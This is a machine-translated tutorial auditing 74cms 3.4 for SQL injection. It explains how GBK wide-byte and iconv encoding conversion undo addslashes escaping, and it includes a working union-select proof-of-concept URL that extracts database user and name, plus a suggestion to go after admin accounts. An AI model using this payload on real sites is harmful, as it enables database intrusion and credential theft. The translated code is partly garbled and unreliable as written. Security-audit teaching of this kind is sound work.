[PHP code audit instance tutorial] SQL injection-5. global protection Bypass wide byte injection

[PHP code audit instance tutorial] SQL injection-5. global protection Bypass wide byte injection 0x01 background

First, let's take a look at the wide byte injection. the wide byte injection is caused by the error set: set character_set_client = gbk when the programmer sets the MySQL connection. this configuration will cause the injection vulnerability caused by encoding conversion. The principle is as follows:

1. Normally, when GPC is enabled or the addslashes function is used to filter parameters submitted by GET or POST, the single quotation marks used by hackers will be escaped :\';

2. however, if there is a wide byte injection, when we enter % df % 27, the escape from the single quotes mentioned above is % df % 5c % 27 (% 5c is a backslash \), before the database query, because GBK multi-byte encoding is used, that is, two bytes within the Chinese character encoding range will be encoded as one Chinese character. Then, the MySQL server will encode the query statement by GBK, that is, % df % 5c is converted into a Chinese character "running" (Note: For the range of GBK Chinese character encoding, see the appendix), and the single quotation marks are escaped, this results in an injection vulnerability.

Now, mysql connections are basically configured as "set character_set_client = binary" to solve this problem, so this article will introduce the injection problem caused by character encoding in php.

The idea comes from FreeBuf:

Http://www.freebuf.com/articles/web/31537.html

The vulnerability comes from Wooyun:

Http://www.wooyun.org/bugs/wooyun-2014-063219

0x02 environment setup

Check the background. We use the 74cms program of a lower version. the version is 3.4 (20140310)

Source code can be found online, I packed a: http://pan.baidu.com/s/1c1mLCru

② Decompress the package to the 74cms (20140310) Directory of www, access http: // localhost/74cms (20140310) in the browser, and install it step by step as prompted, if you have any problems with the installation, go to baidu or google. after successful installation, visit:

0x03 vulnerability analysis Part1: Source code structure

The source code structure is clear, and it should be the clearest structure Audited. It mainly includes the following three parts:

Index. php introduced the common. inc. php file. we followed up with common. inc. php and found the function for processing gpc:

if (!empty($_GET)){$_GET  = addslashes_deep($_GET);}if (!empty($_POST)){$_POST = addslashes_deep($_POST);}$_COOKIE   = addslashes_deep($_COOKIE);$_REQUEST  = addslashes_deep($_REQUEST);

We can see that addslashes will be processed when the server processes the GET and POST requests.

To prevent wide-byte injection, 74cms sets the MySQL connection to binary reading and configures it in/include/mysql. class. php:

Function connect ($ dbhost, $ dbuser, $ dbpw, $ dbname = '', $ dbcharset = 'gbk', $ connect = 1) {$ func = empty ($ connect )? 'MySQL _ pconnect ': 'MySQL _ connect'; if (! $ This-> linkid = @ $ func ($ dbhost, $ dbuser, $ dbpw, true) {$ this-> dbshow ('Can not connect to Mysql! ');} Else {if ($ this-> dbversion ()> '4. 1') {mysql_query ("set names gbk"); if ($ this-> dbversion ()> '5. 0.1 ') {mysql_query ("SET SQL _mode ='' ", $ this-> linkid); // character_set_client = binary mysql_query (" SET character_set_connection = ". $ dbcharset. ", character_set_results = ". $ dbcharset. ", character_set_client = binary", $ this-> linkid );}}}

Next, let's take a look at the consequences of using the iconv function in php.

Part2: audit process

Injection analysis:

1. in the/plus/ajax_user.php Registry:

Elseif ($ act = 'do _ reg ') {$ captcha = get_cache ('captcha'); if ($ captcha ['verify _ userreg '] = "1 ") {$ postcaptcha =$ _ POST ['postcaptcha ']; if ($ captcha ['captcha _ lang'] = "cn" & strcasecmp (QISHI_DBCHARSET, "utf8 ")! = 0) {$ postcaptcha = iconv ("UTF-8", QISHI_DBCHARSET, $ postcaptcha);} if (empty ($ postcaptcha) | empty ($ _ SESSION ['imagecaptcha _ content']) | strcasecmp ($ _ SESSION ['imagecaptcha _ content'], $ postcaptcha )! = 0) {exit ("err") ;}} require_once (QISHI_ROOT_PATH. 'include/fun_user.php '); $ username = isset ($ _ POST ['username'])? Trim ($ _ POST ['username']): exit ("err"); $ password = isset ($ _ POST ['password'])? Trim ($ _ POST ['password']): exit ("err"); $ member_type = isset ($ _ POST ['Member _ type'])? Intval ($ _ POST ['Member _ type']): exit ("err"); $ email = isset ($ _ POST ['email '])? Trim ($ _ POST ['email ']): exit ("err"); if (strcasecmp (QISHI_DBCHARSET, "utf8 ")! = 0) {// Encode and convert the registered name from UTF-8 to GBK $ username = iconv ("UTF-8", QISHI_DBCHARSET, $ username ); $ password = iconv ("UTF-8", QISHI_DBCHARSET, $ password);} $ register = user_register ($ username, $ password, $ member_type, $ email );

Here we will think about the word "encoding". its UTF-8 encoding is e98ca6, its gbk encoding is e55c, and the backslash \ is exactly 5c as mentioned above.

Therefore, if we set username to: quota', first escape the single quotes through the addlashes function or GPC into: quota \', then, upon registration, the icnov function will convert "handler" to gbk encoding, and finally % e5 % 5c % 5c % 27. The backslash is escaped (% 5c % 5c), which causes the injection vulnerability to escape through single quotes.

2. we will continue to follow up on $ register = user_register ($ username, $ password, $ member_type, $ email );

Here, the user_register function is in/include/fun_user.php:

// Check the resume completion degree // register the member function user_register ($ username, $ password, $ member_type = 0, $ email, $ uc_reg = true) {global $ db, $ timestamp, $ _ CFG, $ online_ip, $ QS_pwdhash; $ member_type = intval ($ member_type); // The get_user_inusername function is used to determine whether the user name already exists, follow up with $ ck_username = get_user_inusername ($ username); $ ck_email = get_user_inemail ($ email );...... return $ insert_id ;}

3. continue to follow up the get_user_inusername function in/include/fun_user.php:

Function get_user_inusername ($ username) {global $ db; // you can inject it into the query ~ $ SQL = "select * from ". table ('members '). "where username = '{$ username}' LIMIT 1"; return $ db-> getone ($ SQL );}

Injection 2 analysis:

In plus/ajax_street.php:

Elseif ($ act = 'key') {$ key = trim ($ _ GET ['key']); if (! Empty ($ key) {if (strcasecmp (QISHI_DBCHARSET, "utf8 ")! = 0) // Convert the parameter key from UTF-8 to GBK encoding $ key = iconv ("UTF-8", QISHI_DBCHARSET, $ key); // bring in the query, $ result = $ db-> query ("select * from ". table ('Category '). "where c_alias = 'QS _ Street' AND c_name LIKE '% {$ key} %'"); // output the query result to the page, while ($ row = $ db-> fetch_array ($ result) {if ($ listtype = "li") {$ htm. ="
{$ Row ['c _ name']}
";} Else {$ _ GET ['streetid'] = $ row ['c _ id']; $ url = url_rewrite ('QS _ Street', $ _ GET ); $ htm. ="
{$ Row ['c _ name']} {$ row ['stat _ job']}
";};} If (empty ($ htm) {$ htm =" no keyword found: {$ key} related path! ";}Exit ($ htm );}}

The analysis here finds that the page shows the query results and constructs some union query statements to obtain sensitive information about the database.

0x04 proof of vulnerability

We use injection 2 (with Echo) for proof.

It is found that the 74cms category table has nine fields, so the POC for getting database users and related information is constructed:

Http: // localhost/74cms (20140310)/plus/ajax_street.php? Act = key & key = % E9 % 8C % A6 % 27% 20 union % 20 select % 9%, 3, user (), 7, database (), 23

Check the SQL statement and find that the backslash in the query statement is transferred. the single quotation marks are successfully escaped:

Finally, if you are interested, you can continue to obtain information about other administrator accounts and other related fields.

The range of GBK Chinese character encoding:

The Chinese character area includes:

A. GB 2312 Chinese character area. That is, GBK/2: B0A1-F7FE. 2312 GB 6763 Chinese characters, in the original order.

B. expand the Chinese character area in GB 13000.1. Including:

(1) GBK/3: 8140-A0FE. 13000.1 CJK Chinese characters in GB 6080 are included.

(2) GBK/4: AA40-FEA0. 8160 CJK Chinese characters and supplemented Chinese characters are included. The CJK Chinese characters are in front, arranged by the size of the UCS code; the supplemented Chinese characters (including the radicals and components) are arranged by the page number/character bit of Kangxi Dictionary.

We can see that the two characters in GBK encoding are one Chinese character, and the first character must be greater than 128.

Original article address:

Http://www.cnbraid.com/2016/02/28/sql4/